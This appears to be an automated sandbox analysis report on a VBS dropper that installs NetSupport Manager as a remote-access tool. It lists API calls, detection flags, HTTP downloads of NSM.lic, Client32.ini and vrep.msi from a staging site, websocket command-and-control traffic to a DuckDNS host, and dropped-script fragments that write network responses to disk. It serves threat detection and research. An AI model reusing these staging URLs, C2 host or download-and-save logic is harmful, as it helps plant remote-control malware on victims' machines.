                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,29_2_00FE80C0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE4AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,29_2_00FE4AF0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FE55D0 FindFirstFileW,FindClose,29_2_00FE55D0
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FCFD80 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,29_2_00FCFD80
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FEBE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,29_2_00FEBE60
                                Source: C:\Windows\Installer\MSI1387.tmpCode function: 29_2_00FCFE18 FindFirstFileW,CompareFileTime,FindClose,CreateDirectoryW,MoveFileW,29_2_00FCFE18
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior

                                Software Vulnerabilities

                                barindex
                                Suspicious execution chain found
                                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                                Networking

                                barindex
                                System process connects to network (likely due to code injection or exploit)
                                Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 176.126.113.166 443Jump to behavior
                                Enables network access during safeboot for specific services
                                Source: C:\Windows\Installer\MSI1387.tmpRegistry value created: NULL Service
                                Potential malicious VBS script found (has network functionality)
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.Write xmlHttp.responseBodyJump to dropped file
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.SaveToFile nsmFile, 2Jump to dropped file
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.Write xmlHttp.responseBodyJump to dropped file
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.SaveToFile clientFile, 2Jump to dropped file
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.Write xmlHttp.responseBodyJump to dropped file
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.SaveToFile targetFile, 2Jump to dropped file
                                Uses dynamic DNS services
                                Source: unknownDNS query: name: megaeth1337.duckdns.org
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49748
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49750
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49751
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49752
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49753
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49754
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49755
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49756
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49757
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49758
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49759
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49760
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49761
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49762
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49763
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49764
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49765
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49766
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49767
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49768
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49769
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49770
                                Source: global trafficTCP traffic: 192.168.11.20:49748 -> 185.170.144.66:1773
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                Source: Joe Sandbox ViewASN Name: SAARGATE-ASVSENETGmbHDE SAARGATE-ASVSENETGmbHDE
                                Source: Joe Sandbox ViewASN Name: VDWELLEREE VDWELLEREE
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global trafficHTTP traffic detected: GET /choh/NSM.lic HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /choh/Client32.ini HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /choh/vrep.msi HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /choh/NSM.lic HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /choh/Client32.ini HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /choh/vrep.msi HTTP/1.1Accept: */*Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: tRPuzWtXaHbQaT2zVo4LtA==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: KMCB/AAEvXXZkktXZbBj1g==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: m9kJK3waO5m0WUa27vHefw==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: C/hxaKHuYS2UrlHQxKR4gw==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: caubgnS+MZny0vR9bbg5RA==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: +CDSFNozeAu5QKVlY2hWAg==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: OfCHRkExSmfSkhIE1dUXPg==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: PfOAU8IQZJ/Yqwf/t/iX7A==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: sMjNo1lKJO+LEGT7L1NgIg==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: QT+MbphHbppMnfmijWU4Nw==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: iAsO0TcHuUy74Pc0cvo9HA==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: t3jhEwhGRFSK21cuDwXKUw==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: nh1sF2oxMIjiKKn9/K1PEg==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: 5lgUaUu7TuCWROAY5ZCpFQ==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: blIshCnQwM5gx0hXZZVItg==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: J+H1KaKb9G3hAhTlcn7hzQ==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: Nn8Rhd+1HFurNpMaG8R20g==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: qih66MhM77p0E5xPbe9BTg==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: +EYqtX5iKFS1ntG4M95OBg==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: D4v6s99lRBPXYCfc8h/2uw==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: lCV+TupX3ptsyHMqBQa7VQ==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: UpgradeUpgrade: websocketUser-Agent: NetSupport Manager/1.3Sec-WebSocket-Key: wFD9YmzoAR4jGxbs8QMbCQ==Sec-WebSocket-Version: 13Host: megaeth1337.duckdns.org:1773
                                Source: global trafficDNS traffic detected: DNS query: okolinabeauty.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: global trafficDNS traffic detected: DNS query: megaeth1337.duckdns.org
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 23 Nov 2024 01:54:13 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8e6d87b08eea72b9-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3mH28tc1SOOFomBZWoZLUKlnqr2uLJYLYnYiLsazuB95cS6p5gv8%2B54erWrIw15OSIpIC7953yea4PwoDT2Ly9ZsQ%2FaYsIjUEE8m06qiaeJ5f6O6BGu%2BIclbhZwsSbWZ6PHe7AMPt3CnCEBF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=95240&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 23 Nov 2024 01:54:13 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8e6d87b348338c9b-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ToH%2F6ReBX3KuwJRZCp2hXYx22vJxmqboG4uzh2cjDZPB1tRZKDItf5NVAvt6cO%2F2avq8kYCmW9UVvY2TjqchP5VIrSk92cjIHMGwr%2BBUY5%2BoH2CcwY79YOiSs63odFhmuyHQTiO9BFXGXAl0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=94796&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 23 Nov 2024 01:54:14 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 8e6d87b5d99a0f81-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tOS5fJQ5PrEyHP%2BsaKXZpwDr5%2F13GoXC7jk8Co51P7CSFExPrBNpuBaWwKXjtu6rEkJMmLBfKBQse0xowQbgJU1gAnyzuHjLB8ekYoOhsaRWOlBuVWOvt2gTPm2FT1dRbQpPXTYE2kL0bvyD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=94587&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                                Source: pcicfgui_client.exe, 00000022.00000002.114290574653.000000006B388000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://%s/favicon.icoshcore.dllGetDpiForMonitorPCI
                                Source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: http://%s/gateway.htm
                                Source: client32.exe, 00000020.00000002.115185392651.000000006C888000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll%s:%sCredUIPromptForCredentialsWcredui.dll
                                Source: client32.exe, 00000020.00000002.115187992990.000000006CCD6000.00000002.00000001.01000000.00000016.sdmp, client32.exe, 00000021.00000002.115188138144.000000006CCD6000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: pcicfgui_client.exe, 00000022.00000002.114293124962.000000006C372000.00000002.00000001.01000000.00000022.sdmpString found in binary or memory: http://62.172.138.12/url_redirect.htm#The
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: wscript.exe, 00000006.00000003.114072973646.0000000005BE4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114072266586.000000000DFC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048065766.0000000005BE2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114023155070.0000000008C50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.114048234996.0000000005BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
